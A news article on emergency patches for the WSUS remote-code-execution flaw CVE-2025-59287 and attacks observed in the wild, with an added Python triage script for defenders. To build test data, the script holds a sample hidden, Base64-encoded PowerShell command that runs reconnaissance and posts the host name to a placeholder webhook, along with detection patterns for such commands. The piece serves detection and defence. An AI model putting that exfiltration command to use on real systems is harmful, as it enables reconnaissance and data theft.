WSUS Vulnerability: Attacks Already Observed
Microsoft released emergency updates on Friday morning for a WSUS security vulnerability. It is now being attacked on the internet.
Microsoft released out-of-band emergency patches on Friday morning this week, closing a critical security vulnerability in WSUS (Windows Server Update Services). IT security researchers have observed the first attacks on the vulnerability. IT managers should apply the update now at the latest.
IT security researcher Kevin Beaumont has been "playing around" with the vulnerability and concludes that it can be exploited very easily. It was apparently easy to inject malicious code through the vulnerability. Furthermore, existing research can be built upon to distribute maliciously manipulated update packages with malicious code via the compromised WSUS in the network, he writes on Mastodon.
Attacks on Security Vulnerability Observed
The IT researchers from Huntress have since observed attacks on the WSUS security vulnerability on the internet. The attacked WSUS services had TCP ports 5830 and 5831 exposed to the internet. "The attackers used exposed WSUS endpoints to send specially crafted requests (multiple POST calls to WSUS web services) that triggered a deserialization RCE [Remote Code Execution] against the update service," they write in their analysis.
They further report that a Base64-encoded PowerShell script was decoded and executed. The script searches servers for sensitive network and user information and transmits the results to a remote webhook. The attackers also used proxy networks to carry out and conceal their attacks, the Huntress researchers explain.
The analysis also lists some Indicators of Compromise (IOCs) that admins can use to check whether the systems they manage have already been targeted by cybercriminals. These include conspicuous entries in the web server logs and in the WSUS software distribution logs.
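As an added example (not code from the article or from Huntress), the following Python script shows how a defender can triage the two signals described above offline: bursts of POST requests to WSUS SOAP endpoints from addresses outside the internal network in IIS W3C logs, and Base64-encoded PowerShell command lines that, once decoded, contain reconnaissance commands and an outbound webhook call. The log excerpt, the process command line, the `.asmx` endpoint names used as a match rule, the RFC 1918 definition of "internal", and the keyword heuristics are all constructed assumptions for this example, not IOCs from the Huntress analysis.

```python
"""Triage helpers for the WSUS attack pattern described in the article.
Added example: all sample data, endpoint rules and keyword heuristics are constructed assumptions."""
import base64
import binascii
import ipaddress
import re
from collections import Counter

# Constructed IIS W3C log excerpt (not real telemetry); a reduced field set keeps the example short.
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem c-ip sc-status
2025-10-24 06:01:10 POST /ClientWebService/Client.asmx 10.0.0.15 200
2025-10-24 06:02:41 POST /ClientWebService/Client.asmx 203.0.113.77 200
2025-10-24 06:02:42 POST /ClientWebService/Client.asmx 203.0.113.77 200
2025-10-24 06:02:43 POST /SimpleAuthWebService/SimpleAuth.asmx 203.0.113.77 500
2025-10-24 06:02:44 POST /ClientWebService/Client.asmx 203.0.113.77 200
2025-10-24 06:05:00 GET /Content/example.cab 10.0.0.22 200
"""

# Assumed definition of "internal": RFC 1918 ranges plus loopback. Adjust to the site's own address plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_w3c(text):
    """Parse IIS W3C extended log text into dicts keyed by the names in the #Fields header."""
    fields, records = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                records.append(dict(zip(fields, values)))
    return records


def suspicious_wsus_posts(records, threshold=3):
    """Return {client_ip: count} for non-internal IPs that POST to WSUS .asmx (SOAP) endpoints
    at least `threshold` times. WSUS clients live on the LAN, so SOAP traffic from outside is itself an anomaly."""
    counts = Counter()
    for rec in records:
        if rec.get("cs-method") != "POST" or not rec.get("cs-uri-stem", "").lower().endswith(".asmx"):
            continue
        try:
            ip = ipaddress.ip_address(rec["c-ip"])
        except ValueError:
            continue
        if not any(ip in net for net in INTERNAL_NETS):
            counts[str(ip)] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


# Heuristic: common spellings of the -EncodedCommand switch followed by a Base64 token.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def encode_for_powershell(script):
    """Base64 of UTF-16LE, the form powershell.exe -EncodedCommand expects (used here only to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Extract and decode a -EncodedCommand argument from a process command line; None if absent or invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


# Assumed keyword heuristics: host/user discovery, network discovery, and outbound posting of results.
RECON_PATTERNS = {
    "user-enum": re.compile(r"(?i)\bwhoami\b|Get-LocalUser|net\s+user"),
    "net-enum": re.compile(r"(?i)ipconfig|Get-NetIPConfiguration|Get-NetIPAddress"),
    "outbound-post": re.compile(r"(?i)Invoke-(?:WebRequest|RestMethod)[^;|]*-Method\s+Post|webhook"),
}


def triage_encoded_command(cmdline):
    """Decode an encoded PowerShell command line and report which heuristic categories the script matches."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"decoded": None, "indicators": []}
    return {"decoded": script,
            "indicators": [name for name, pat in RECON_PATTERNS.items() if pat.search(script)]}


# Constructed sample command line mimicking the reported behaviour; the webhook URL is a placeholder.
SAMPLE_SCRIPT = ("whoami; ipconfig /all; Invoke-RestMethod -Uri https://webhook.example/hook "
                 "-Method Post -Body $env:COMPUTERNAME")
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -enc " + encode_for_powershell(SAMPLE_SCRIPT)

if __name__ == "__main__":
    print(suspicious_wsus_posts(parse_w3c(SAMPLE_IIS_LOG)))
    print(triage_encoded_command(SAMPLE_CMDLINE))
```

On a real server, feed `parse_w3c` the IIS log files of the WSUS site and `triage_encoded_command` the command lines from process-creation events (for example Sysmon event ID 1 or Security event 4688 with command-line auditing enabled); the threshold and keyword lists are starting points to tune, not a substitute for the published IOCs.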
On Friday morning, Microsoft announced the distribution of emergency updates for WSUS. The description reads: "Deserializing untrusted data in Windows Server Update Service allows an unauthenticated attacker to execute code over a network" (CVE-2025-59287, CVSS 9.8, risk "critical"). Microsoft's security advisory is currently being updated frequently. Microsoft now also provides stand-alone updates, for example for servers that use hotpatching. After installation, however, these require a restart if the server offers WSUS services.
(dmk)